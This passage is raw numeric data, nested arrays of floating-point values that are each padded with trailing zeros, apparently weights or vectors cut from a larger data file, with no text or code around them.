0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.512819, -1.55515, 3.80889, -0.669636, -0.595168, -3.35302, -0.951652, -2.33358, 6.1563, 0.0125516, 0.623092, -1.90052, 0.638503, -3.33116, -0.0312064, -0.324169, -2.49058, 0.861782, -1.33819, -4.22818, -0.847625, -0.105883, -0.33, 1.77039, 2.70489, 1.43031, -1.20832, -0.231104, -1.13776, 9.4714, -0.671943, 0.00446878, -0.137839, -0.593724, -0.422652, -1.76687, 1.65993, 0.755269, 2.10153, -1.27609, 1.58772, -2.78202, 0.361769, -2.00126, -0.778894, 1.23621, 0.788718, 0.0386314, -0.203662, -2.71628, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.15628, 0.112975, -2.696, -0.0929159, -0.114286, -2.39392, -0.0321934, 0.352787, -0.221858, -0.0208618, -0.393997, -0.0992529, 0.0912523, -0.21713, -0.0167364, -0.199261, -0.0310063, 0.16779, 0.0299587, 0.282117, -0.886747, -0.0472178, 0.0112031, 0.726206, 0.185312, 0.119465, 0.0112261, -0.0960156, 0.219136, 0.321126, -0.0608714, -0.359181, 0.100634, -0.171019, 0.0121608, 0.329051, -1.37075, 0.506645, 0.0218327, 0.347524, -0.366647, 0.184254, -0.0986234, -0.114808, -0.341026, -0.412896, -4.21376, 0.0282555, 0.362087, -2.27503, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.018116, -0.688114, 0.355782, -0.158535, 0.0326831, -0.704587, -0.0746711, -0.187797, 0.318406, -0.469804, 0.0289892, -0.194649, 0.3991, 0.178563, -0.0123404, 0.0823342, 0.118463, -0.59833, -0.0358356, 0.035818, 0.243321, -0.433698, 0.448077, -0.0485438, -0.156686, 0.104779, 0.141928, -0.178951, 0.623091, -0.371928, 0.16347, -0.0922999, -0.0567132, -0.0821873, 0.0328512, -0.50144, 0.203289, -0.096286, 0.0573721, -1.55016, 0.257796, 0.225554, -0.201173, 0.364526, -0.00998764, -0.985847, 0.0182788, -0.023686, -0.0723469, 0.447116, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.74015, -0.397148, 1.79801, 0.0996511, -0.142658, -0.547512, 0.0200878, 0.394112, 0.236619, -0.011665, 0.0521026, -0.452225, -0.821851, -0.00759356, 0.00402091, -0.0667074, -0.00424326, 0.208753, -0.0234869, 0.0768873, -0.13006, -0.00989095, 0.0485464, 0.0471453, 0.920901, 0.00489362, 0.0218371, 0.0406351, -0.245331, 2.54714, -0.0127445, 1.20106, -0.375378, -0.104825, -0.071136, -0.391505, 0.309504, 0.0963099, -0.507734, 0.536791, 0.0606857, 0.0346801, 0.732768, -0.126133, -0.133468, -0.0754325, 0.376699, -0.00777351, 0.225494, -0.734792, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-2.03088, -0.155727, -0.248909, -0.185697, 0.402917, -0.0390676, -0.281417, 0.68385, 1.05825, -0.579026, 0.218483, -0.24237, 0.980957, -0.77596, -0.0127888, 0.18933, -0.623748, -0.717682, -0.606729, 2.17902, -0.101283, -0.606275, 0.736636, -0.391787, 0.727771, -0.587775, -0.834278, -0.473717, 0.251169, 2.23663, 0.579148, 0.588325, 0.350588, -0.864033, 0.37841, -0.929261, 0.0985265, 0.026859, -0.109312, -2.03724, -0.210657, 0.346805, -0.120065, -1.0487, 0.27648, -1.70485, 0.0619824, -0.0170093, -0.0337802, 0.453055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.134509, -1.45003, 0.292652, -0.187551, -0.0231918, -4.8773, -0.16623, -0.832317, 0.629619, -0.214393, -2.32775, 0.00882944, 0.508135, -0.207935, 0.00673275, -0.298272, 0.151668, 0.0384905, -0.0148084, 0.522095, 0.0346454, 0.0872506, -0.294643, 0.566773, 1.13618, 0.211747, -0.418215, 0.428726, -0.329257, 2.60937, -1.1289, -0.44999, -0.764455, -0.00265432, -0.032117, 1.38089, -2.4579, 0.0615875, -0.774395, -0.666606, 0.395994, 0.170767, -0.203539, 0.0846183, 0.478258, 0.0936237, 0.0213258, 0.0103008, 0.57572, -0.044792, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.221371, -0.462056, -1.04637, -0.0847253, -0.0863158, -0.66562, 0.00810122, -0.0475918, 1.67965, -0.0880703, 0.276837, -0.305258, -0.106463, -0.0209559, -0.0221157, -0.0392417, 0.0156593, -0.0883511, -0.265426, 0.495479, 0.0158834, -0.0313959, 0.00189376, 0.201395, 0.427881, 0.000952049, -0.0326239, -0.0328697, -0.311255, 0.835929, 0.0384777, 0.146877, -0.274332, -0.0561148, 0.110098, 0.393372, -0.397495, -0.290429, 0.128022, -0.848171, -0.153973, 0.0874094, 0.163239, -0.0560784, 0.195893, 0.0780177, 0.25038, -0.0238414, 0.0883915, -0.060578, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.38376, 0.20059, -0.16424, -0.121489, 0.00473864, -0.725031, 0.0675223, -0.189969, -0.0637548, 0.156876, 0.0125627, 0.467099, 0.149763, 0.0536317, -0.0170047, -0.0708157, 0.0957326, 0.0232962, 0.403031, -0.27095, 0.0337353, 0.146962, -0.0240061, 0.164953, -0.608584, 0.211669, 0.563962, 0.0669437, 0.394516, -0.128171, -0.144911, -0.205429, -0.0609732, 0.0378101, 0.0804393, 0.3316, -0.446167, -0.160952, 0.0677892, 0.206843, -0.036053, 0.0200441, -0.443373, 0.151166, 0.0418186, 0.165992, -0.449106, -0.0391579, -0.0147807, 0.0480222, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.404076, -0.0419424, 1.41769, -0.765138, -2.32233, 0.611769, 1.07246, 0.653312, 0.166853, -0.486954, -0.323731, -0.5293, -0.165618, 0.000804496, 0.0333297, -0.125676, -0.634638, -0.371691, 0.264503, 0.683032, -0.227846, 0.115096, -0.0450159, 0.223376, 0.650941, 0.128426, -0.0337287, -0.58971, 0.332945, -1.6172, 0.653333, -0.0253915, 0.13049, -0.39881, -0.0889884, 0.176723, 0.28311, -0.0912782, -0.291117, -1.1341, 0.0394494, 0.187399, 1.29316, -1.28824, -0.912278, 0.394143, 0.793827, -0.0290338, 0.391215, 0.176, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.2586, 0.953439, 0.358845, -0.128209, -0.192998, -1.1001, 0.670785, -1.44927, -0.448864, 0.111651, 0.421026, 1.45395, -0.292067, -1.47263, 0.00661507, -0.112594, -0.669622, 0.105545, -0.424528, 1.98016, -1.36578, -3.41133, 0.388779, 0.355398, 0.352509, -0.765559, 0.517842, -0.0589605, -0.544098, 0.0806625, 0.346438, 0.421414, -0.132525, -1.23272, -1.3066, -0.213365, 0.727457, 0.0965079, -1.14517, 2.12791, 0.909574, 0.776518, 1.3762, -0.399836, 0.236509, -0.0448613, 0.925439, -0.0096885, 0.0980403, -3.74682, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.144398, 0.944435, -6.52346, -0.140787, -0.771333, 0.361272, -0.329932, -1.09612, -3.53029, -1.62412, 5.4805, -0.491052, 0.160924, -1.33929, -0.0361681, 0.308141, -0.388448, -4.44593, -0.0815642, 2.5366, -1.54709, 0.912508, -0.251726, 3.07993, -2.83219, -5.13012, 1.78755, -0.780049, 3.4665, 0.122828, 0.789207, -1.20975, -0.426088, 0.296093, 0.223132, -1.07246, -2.48551, 2.04708, 0.940531, 0.419219, -2.83906, 3.34849, 0.8725, -5.29062, 2.4045, -0.964443, -8.39952, -0.0394036, -4.03658, -3.31629, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.216987, 0.431716, 0.101036, 0.676643, -0.239259, -0.644002, 0.45217, 0.149218, 0.575255, 0.539549, -1.14147, -0.0388974, 0.417126, -2.5186, 0.0329096, -0.129417, -6.19952, 0.556412, -3.08438, -0.474449, -0.578393, -0.0792406, -1.55042, 0.805285, -0.348269, -0.567471, 0.0119641, -0.0991636, -1.73113, 1.9284, -0.225436, -0.164566, -0.087291, -0.201831, -0.0596637, 0.419267, -0.324364, 0.783502, -0.17094, -0.146647, 0.315248, -0.192383, 0.449949, -1.28941, -1.84316, 0.323579, 0.0854937, 0.0301617, 0.255968, -2.36518, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0651774, 0.131578, 0.455438, -0.238157, -0.165716, 0.589775, 0.165163, 0.224065, -0.0583999, -0.145891, -0.174407, -0.213818, -0.0859563, -0.0652727, -0.00376936, -0.0917978, -0.0688946, 0.0341639, -0.15266, 0.477196, 0.0837651, 0.0367946, -0.0726499, 0.0753374, 0.171091, 0.00549605, -0.233555, -0.119967, -0.068452, -12.8383, -0.880406, -0.163688, 0.039351, -0.181738, -0.081696, -0.255844, -0.21875, -0.296748, 0.227985, -0.389049, 0.0387661, 0.155939, -0.111301, 0.0886789, 0.0900578, 0.00227072, 0.0350527, 0.0260911, 0.382048, 0.22435, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.467969, -0.28572, -1.41029, -1.45105, -5.93991, 1.38801, -0.731097, 0.883655, -0.818314, -0.25131, 1.52338, -0.853826, 0.249576, -0.0978616, 0.0163493, -0.0591605, 0.0208357, -3.03835, -0.00947109, 1.32725, -1.9915, -0.385439, -0.0109491, -0.66593, -1.02611, 0.0677868, -0.255052, -0.208263, 0.569563, 0.0505852, 0.0718921, 0.202451, -0.138924, -0.339872, 0.087764, 0.545014, -1.29585, -0.759556, -0.797292, -1.09192, -1.32351, 0.953724, -0.325783, 1.35595, 0.649024, -2.72836, 0.577709, -0.0358155, 0.57044, -0.385399, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.282938, 1.68018, 1.07629, -0.620943, 0.0434746, 0.296723, 1.2045, -0.244555, 0.968058, -0.126185, 1.0286, 0.749134, -1.60557, -0.315543, -0.0312326, -0.139754, 0.117409, 0.136566, 0.0986693, 1.65825, 0.371837, -0.351298, -0.0299128, -0.22872, -0.407847, 0.0792935, -0.19151, -0.341003, 0.776699, 0.792872, -1.12557, 0.286089, -0.659899, 0.199452, 0.112973, -0.500828, -0.481456, 1.09779, 0.0178231, 0.437044, -0.0393423, -0.221312, 0.565016, -0.069832, -0.174937, 0.214048, 0.346389, -0.046224, -0.373601, -0.378589, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0282119, 0.655421, -1.92449, -4.4303, -3.76537, 1.63412, -0.512826, 0.559951, -0.436864, 0.283807, -0.0470535, -8.90888, -0.438095, -0.0165175, -0.019949, -0.202189, 0.114961, 0.102691, 0.00820977, -0.152767, 0.908944, -0.0272886, -4.95957, 0.0434976, 0.10557, -0.0287552, 0.0717929, -0.244871, -0.000863109, -0.739313, 0.119551, -0.467674, -2.81641, -0.0876342, -0.00487859, 0.698549, 0.928057, -1.0584, 0.145505, 1.04297, -0.0467779, -1.13003, 0.724863, 1.46841, -5.91343, -0.0759377, -1.92188, -0.00735915, -0.165947, -3.82198, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.242008, -0.0143518, 0.829281, -0.962464, 0.0598716, 0.00429408, 0.295746, 0.156866, 0.103791, -0.255729, -0.430983, 0.0474375, -0.742686, -0.0068865, 0.00225077, -0.110512, -0.71115, 0.0787291, 0.150878, 0.00790266, -0.133806, 0.0156908, -0.320961, 0.407703, 0.44077, -1.042, -0.375426, -0.0262698, 0.817547, -0.507463, -0.122921, -0.105363, 0.121477, -0.239359, -0.426859, 0.275346, 0.277036, 0.117458, 0.100358, 0.239277, -0.0684942, 0.282144, 0.771653, -0.704539, 0.219761, -0.300022, 0.791541, 0.0346975, 0.269311, -0.428704, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.684779, -1.23925, -0.267095, 1.61387, 0.142103, -0.921054, -0.45163, -1.28687, -1.08755, 0.476307, 0.562988, -1.35387, -0.120373, -1.4514, 0.0106518, 0.0503995, -3.21986, 0.225937, -1.32647, -0.599701, -0.386049, 0.317367, -0.693967, 0.628627, 1.40369, -0.778355, -0.861718, 0.412826, -1.35889, 0.990398, -1.39497, 0.307451, 0.198362, 0.410512, -0.333451, -1.0943, 1.04271, -0.871418, 0.239592, -4.30839, -0.255597, -1.11285, -0.598663, -0.939516, 0.128542, 0.6008, -0.771214, 0.0468901, 0.399295, -1.13734, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.121418, 0.0887225, 0.0371437, 0.118398, -0.193567, -0.485059, -0.166727, -0.086693, 0.889451, -0.137104, 0.0602432, -0.434929, 0.0403237, -0.205467, 0.0486817, -0.00918316, -0.236275, -0.0637436, 0.0847122, -0.0280539, -0.0872957, 0.0251945, -0.00415574, -0.10905, 0.321388, -0.17211, -0.302408, 0.0503998, 0.0394051, -0.207033, -0.0905195, 0.237472, 0.0400698, -0.209811, -0.0619867, -0.21807, 0.127765, 0.112882, 0.00171291, -0.11847, -0.0661039, 0.0295239, 0.455934, -0.296326, -0.182833, -0.00336458, 0.183689, 0.0393237, 0.173754, 0.0867553, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0371726, 0.0334255, 0.161873, -0.200124, 0.0542473, -2.00254, 0.218968, -0.116694, -0.0584859, 0.071341, -0.351633, 0.594386, 0.129516, -0.241845, 0.00929755, 0.00307103, 0.119392, 0.105445, 0.24893, 0.571974, 0.253325, -0.0334011, -0.0632295, 0.149691, 0.472255, 0.140529, 0.156288, -0.0179687, 0.352836, 1.39679, -5.10451, -0.706279, -0.481158, 0.0409242, 0.00194056, -0.501476, 0.0368214, 0.38285, 0.0885774, -0.156656, 0.086926, -0.649707, -0.266136, 0.0716584, 0.10027, 0.0243436, -0.172501, 0.0417889, -0.0181834, -0.0945115, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.525492, -0.297079, 0.669968, -0.229898, -0.00759089, -0.538653, -0.0594109, 1.11823, -2.04004, 0.666147, 0.116758, -0.171682, -1.24497, -1.80744, 0.00690396, 0.128635, 0.24266, 0.174364, 1.08595, 1.63061, -0.639053, -0.21702, -0.0491286, 0.297638, -0.563711, -0.127201, 0.0292218, -0.859784, 3.72925, -11.6126, 0.944555, -0.892475, 0.622695, -0.0795862, -0.0597896, 0.178346, 0.223332, 0.787762, 0.305543, -0.178452, 0.288511, -0.699318, 0.428386, 0.21143, -1.49987, 0.734354, -0.162341, 0.0240091, -0.402675, 0.293782, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0616888, -0.522319, -0.175403, -0.0572232, -0.295034, 0.847519, 0.641399, 0.265849, 0.160254, 0.133999, 0.100854, -0.129023, 0.371135, -0.324103, 0.0577432, -0.110337, -0.413792, -0.351571, -0.450386, 0.288996, -0.425387, -0.484391, -0.11695, -0.202581, 0.119454, -0.567001, -0.16437, -0.248797, -0.676047, 0.438264, -0.0689069, 0.0412898, -0.0401866, -0.481069, -0.109339, -0.176187, 0.433589, 0.123114, -0.113177, 0.746687, -0.318235, 0.345405, 0.384048, -0.286015, 0.135669, -0.245525, 0.339653, -0.0234591, 0.479016, -0.0245504, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.03333, -0.420223, 0.395815, 0.163183, 0.10879, -0.583208, 0.0209813, -0.184093, -0.0245447, 0.040377, 0.0373998, 0.0559828, 0.259972, 0.352318, 0.00350468, -0.00783364, 0.120631, 0.0725094, 0.0820311, -0.156981, 0.00489784, 0.148705, 0.00142702, 0.111936, 0.340559, 0.0724226, -0.0959207, -0.152691, 0.0844416, 0.279474, -0.925087, 0.00165565, -0.0079441, 0.182121, 0.0668509, -0.467214, 0.0748087, -0.0174181, -0.0756833, -0.285231, 0.0500349, -0.107036, -0.402067, 0.148978, 0.266857, 0.146448, -0.116426, 0.00931608, 0.0834037, 0.154813, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.347632, -0.327401, 0.605528, 0.0714051, -0.142411, 0.455937, 0.541103, 0.0210319, -0.0268355, -0.0252585, 0.0554241, -0.193942, -0.19294, 0.387868, 0.0525489, 0.0783566, -0.584597, 0.130106, -0.42158, 0.503848, -0.0926099, -0.114307, -0.0689267, 0.0697529, 0.639038, -0.129007, -0.0843851, -0.497716, -0.0927106, 1.91638, 0.0808919, -0.0645766, 0.0306129, -0.176848, -0.175264, 0.113871, 0.64888, 0.0495647, -0.215063, 0.039443, -0.00478932, 0.110907, -0.356772, -0.238222, -0.0782477, 0.156826, 0.506756, -0.0344773, 0.352656, -0.389609, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.225502, 0.518288, 0.558638, -0.515126, 0.0242073, -0.411341, 0.533368, 0.175902, 0.655053, 0.28547, -0.219699, -0.578468, -0.0843267, -0.501413, -0.0218207, -0.0432255, -1.0852, 0.0502407, -0.78696, 1.11122, 0.0573125, 0.0035622, -0.793858, 0.103274, 0.397639, -0.301453, -0.29745, -0.339079, 0.826933, 1.69057, -0.0982163, 0.282238, 0.162588, -0.208234, -0.0778498, 0.875148, -0.51445, 0.517551, 0.0572592, 0.947806, 0.079075, 0.568983, 0.182329, 0.291328, 0.0767892, 0.141164, 0.552632, -0.0276699, 0.0935139, -0.948284, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [1.15895, -0.082995, -0.524102, 1.97089, -1.27179, 0.548526, 0.343785, -0.396628, -1.1918, 0.408974, -2.06459, -0.202667, -0.0633527, -1.19364, 0.0140823, 0.0865772, -4.49103, 1.10932, -2.25927, -0.0323453, -0.744064, -1.11839, -2.42957, 0.84994, 0.554298, -0.670113, 0.370126, -0.220629, -3.85987, -0.82413, 0.211442, -0.303557, -0.116857, -1.29532, -0.732952, -0.100872, 0.693875, 1.19253, -1.39031, -0.227825, -0.696725, 0.504844, -0.990508, -2.96575, -6.15761, 0.533333, -0.560934, -0.00989478, -0.020721, -2.5646, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.785951, -0.328681, 0.374446, 1.14356, 1.19847, 2.08369, 0.13618, -0.106309, -0.218635, 0.593345, 0.0391423, 0.903166, -0.947125, -4.92236, 0.0259727, 0.338586, -1.58461, -0.639623, -2.84456, -0.154997, -0.677088, 